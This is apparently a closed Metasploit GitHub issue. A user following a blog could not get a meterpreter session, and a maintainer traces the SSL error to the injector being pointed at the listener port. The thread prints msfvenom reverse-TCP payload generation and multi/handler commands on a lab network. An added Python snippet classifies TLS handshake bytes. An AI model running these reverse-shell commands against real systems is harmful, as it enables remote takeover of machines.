Closed zoo143 closed 7 years ago
How are you generating the payload? msfvenom? Can you post the logs?
root@kali:~# msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.56.4 LPORT=4444 -f python
No platform was selected, choosing Msf::Module::Platform::Windows from the payload
No Arch selected, selecting Arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 333 bytes
Final size of python file: 1602 bytes
root@kali32:~#
root@kali32:~# msfconsole
msf > use multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(handler) >
msf exploit(handler) > set LHOST 192.168.56.4
LHOST => 192.168.56.4
msf exploit(handler) > show options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description

Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.56.4     yes       The listen address
   LPORT     4444             yes       The listen port

Exploit target:

   Id  Name
   0   Wildcard Target

msf exploit(handler) > exploit

[*] Started reverse TCP handler on 192.168.56.4:4444
[*] Starting the payload handler...
[*] Sending stage (957999 bytes) to 192.168.56.119
[-] OpenSSL::SSL::SSLError SSL_accept returned=1 errno=0 state=SSLv2/v3 read client hello A: unknown protocol
How did you invoke your payload with format 'python' on the target?
I noticed your expected behavior section is from 2015. Are you following some sort of tutorial or blog post about exploiting python programs?
Yes, I follow this blog: http://inaz2.hatenablog.com/entry/2015/07/13/011841
Thanks.
I followed the blog steps and it worked as expected. I'm suspecting you pointed the Python shellcode injector at the Metasploit listener, instead of the vulnerable service. That would create the error you see here. The blog is confusing because the author uses port 4444 for both the vulnerable service and the listener. Try changing the ports and you will see what I mean.
Good luck.
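Added example, not part of the original thread or of Metasploit's code: the handler log above ends in `SSL_accept ... unknown protocol`, which a TLS server reports when the first bytes it reads are not a ClientHello. The sketch below is a simplified model of that first-bytes check (the function name, labels and sample bytes are constructed for illustration), useful for triaging what actually connected to a listener port.

```python
# Simplified model of the first-bytes check a TLS server performs before it
# treats incoming data as a ClientHello. Illustrative only, not OpenSSL's code.

TLS_HANDSHAKE = 0x16   # TLS record content type: handshake
TLS_MAJOR = 0x03       # major version byte shared by SSLv3 and TLS 1.x
CLIENT_HELLO = 0x01    # handshake message type: ClientHello
HTTP_PREFIXES = (b"GET ", b"POST ", b"HEAD ", b"PUT ", b"CONNECT ")

# Constructed samples: first bytes of three different kinds of connection.
SAMPLE_TLS = bytes.fromhex("160301002f0100002b0303")   # TLS record + ClientHello
SAMPLE_SSLV2 = bytes.fromhex("802e01000200")           # SSLv2-style hello
SAMPLE_HTTP = b"GET / HTTP/1.1\r\nHost: example\r\n\r\n"
SAMPLE_RAW = b"\x41" * 16                              # arbitrary non-TLS bytes


def classify_first_bytes(data: bytes) -> str:
    """Return how a TLS listener would interpret the start of a connection."""
    if len(data) < 6:
        return "too-short"
    # SSLv2-compatible hello: high bit set in the length, then message type 1.
    if data[0] & 0x80 and data[2] == CLIENT_HELLO:
        return "sslv2-client-hello"
    # SSLv3/TLS: record type 0x16, version 3.x, handshake type ClientHello.
    if (data[0] == TLS_HANDSHAKE and data[1] == TLS_MAJOR
            and data[5] == CLIENT_HELLO):
        return "tls-client-hello"
    # Plain HTTP sent to a TLS port is a common, separately reported mistake.
    if data.startswith(HTTP_PREFIXES):
        return "plaintext-http"
    # Anything else is what the log reports as "unknown protocol".
    return "unknown-protocol"


if __name__ == "__main__":
    for name, sample in [("tls", SAMPLE_TLS), ("sslv2", SAMPLE_SSLV2),
                         ("http", SAMPLE_HTTP), ("raw", SAMPLE_RAW)]:
        print(f"{name:6s} {sample[:6].hex():14s} {classify_first_bytes(sample)}")
```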
Steps to reproduce
How'd you do it?
Expected behavior
It's to obtain a meterpreter session. Meterpreter prompt should show up as below.
Current behavior
Metasploit version
Get this with the version command in msfconsole (or git log -1 --pretty=oneline for a source install).
I installed Metasploit with:
OS
Linux kali32 4.6.0-kali1-686-pae #1 SMP Debian 4.6.4-1kali1 (2016-07-21) i686 GNU/Linux